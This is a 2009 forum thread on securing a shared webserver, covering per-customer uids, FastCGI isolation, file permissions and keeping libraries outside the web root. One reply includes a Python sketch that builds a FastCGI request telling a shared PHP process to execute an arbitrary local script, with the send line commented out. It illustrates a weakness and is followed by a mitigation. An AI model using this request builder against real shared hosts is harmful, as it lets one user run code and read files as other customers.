Forum

Webserver security

William
11 July 2009, 11:55
I was wondering what thoughts you had on hardening a webserver, such as the FastCGI process uid and gid and file permissions? Perhaps you could write a page about these kinds of security considerations.

My thoughts on securing my webservers: I've got a separate uid and gid for each customer, and the FastCGI process for that customer runs with their respective uid and gid. The customer's WebsiteRoot and files are owned by the customer's uid and the www gid. This way they cannot see or write each other's files. A security vulnerability will be isolated to that specific customer and the others will not be affected. The webserver can access the group-readable files since they're group-owned by the webserver. Each customer has their own php.ini, with the PHP sessions and upload directory owned by that uid and gid to prevent session stealing and the like. What do you think of this setup?
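The ownership scheme described above can be sketched with Python's standard library. This is only an illustration of the permission bits involved; the function name and the temporary directory are my own, and the real setup would additionally chown each directory to the customer's uid and the shared www gid (which requires root, so it is shown only as a comment):

```python
import os
import stat
import tempfile

def secure_customer_dir(path, mode=0o750):
    """Apply owner-rwx, group-rx, other-none permissions to a customer dir.

    In the setup described above, the directory would also be owned by
    the customer's uid and the shared 'www' gid, e.g.:
        os.chown(path, customer_uid, www_gid)  # requires root privileges
    so the webserver (group 'www') can read, while other customers cannot.
    """
    os.chmod(path, mode)
    return stat.S_IMODE(os.stat(path).st_mode)

# Demonstration on a throwaway directory (chown omitted: needs root).
d = tempfile.mkdtemp()
print(oct(secure_customer_dir(d)))  # 0o750: "other" users get no access
```

With mode 0750, only the owning customer can write, the www group can read and traverse, and every other uid on the machine is locked out.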

The customer's WebsiteRoot is in a directory below their home directory and only contains the files that browsers need to access, such as index.php, CSS, and images. index.php then accesses any other files it needs, such as libraries, outside of the WebsiteRoot by going up directories ("../"). This way only what's needed is exposed to the internet.

I think this is a pretty secure setup. But I'm sure you have some good ideas too on how to improve it, or on how it could be flawed.
Hugo Leisink
11 July 2009, 14:00
I don't know what kind of FastCGI process we're talking about here, but if it's PHP, the problem is that it will take quite some memory to start a separate FastCGI process for each user. How many users does your webserver have? What you can do is use your FastCGI setup for the high-traffic websites and (assuming you use Hiawatha) use the cgi-wrapper for the low-traffic websites. See the cgi-wrapper HOWTO for more information about the cgi-wrapper.

The flaw in your FastCGI setup is that any user can access any FastCGI application directly. Of course, this is harder than simply reading a file, but it is possible. If we're talking about PHP as the FastCGI process, any user can write a script, connect to the right local port and instruct PHP to execute his/her script. This way, you can not only read other users' files, but also run programs as that other user, which is even worse. This can be solved by using the cgi-wrapper for every website, but this will make things slower (PHP via FastCGI is about 15 times faster than via normal CGI).
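To illustrate how little effort this attack takes: the FastCGI wire protocol is simple enough that any local user can speak it in a few lines of code. The sketch below builds (but deliberately does not send) a request telling PHP to execute an arbitrary script; the port 9000 and the attacker's script path are assumptions for illustration, not anything from this thread:

```python
import struct

# FastCGI record types and role, per the FastCGI specification.
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
FCGI_RESPONDER = 1

def fcgi_record(rec_type, request_id, content):
    """Build one FastCGI record: 8-byte header + content (no padding)."""
    return struct.pack(">BBHHBB", 1, rec_type, request_id,
                       len(content), 0, 0) + content

def fcgi_param(name, value):
    """Encode one name-value pair (short form, lengths under 128 bytes)."""
    return bytes([len(name), len(value)]) + name + value

# A request that asks PHP to run a script of the attacker's choosing.
# '/home/attacker/evil.php' is a hypothetical path.
begin = fcgi_record(FCGI_BEGIN_REQUEST, 1,
                    struct.pack(">HB5x", FCGI_RESPONDER, 0))
params = fcgi_record(FCGI_PARAMS, 1,
                     fcgi_param(b"SCRIPT_FILENAME", b"/home/attacker/evil.php"))
request = (begin + params
           + fcgi_record(FCGI_PARAMS, 1, b"")   # empty record ends PARAMS
           + fcgi_record(FCGI_STDIN, 1, b""))   # empty record ends STDIN
# socket.create_connection(("127.0.0.1", 9000)).sendall(request)  # would run it
```

If the FastCGI socket is reachable by every local user, nothing in this exchange proves who is asking, which is exactly why the per-user isolation breaks down. Restricting the socket with filesystem permissions (a Unix socket owned by the right uid) is one way to close this hole.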

In my opinion, you're overdoing it. Good security doesn't come from some technical solution. Security comes from trust and good auditing methods. At what level do you trust your users? Divide all users according to their trust level. Give each trust level its own server. Give extra attention (auditing) to the lower-trust-level servers. If you don't trust a user at all, don't give them access, paying customer or not. And of course, let every user sign a contract which says that hacking or even sniffing around is NOT allowed; any kind of abuse will result in account removal. That, in combination with just a single PHP FastCGI process which runs every script of every user under the same userid and some good auditing methods, is secure enough. But that's just my opinion.

About your website directory layout: that sounds good. I also build my web applications that way. Still, this setup gives you no security if your website allows visitors to read any file on disk via, for example, a parameter in the URL. Security is like a chain: it's as strong as the weakest link. In my opinion, the weakest link in web security is still the website, not the webserver, not the database, not the OS.
This topic has been closed.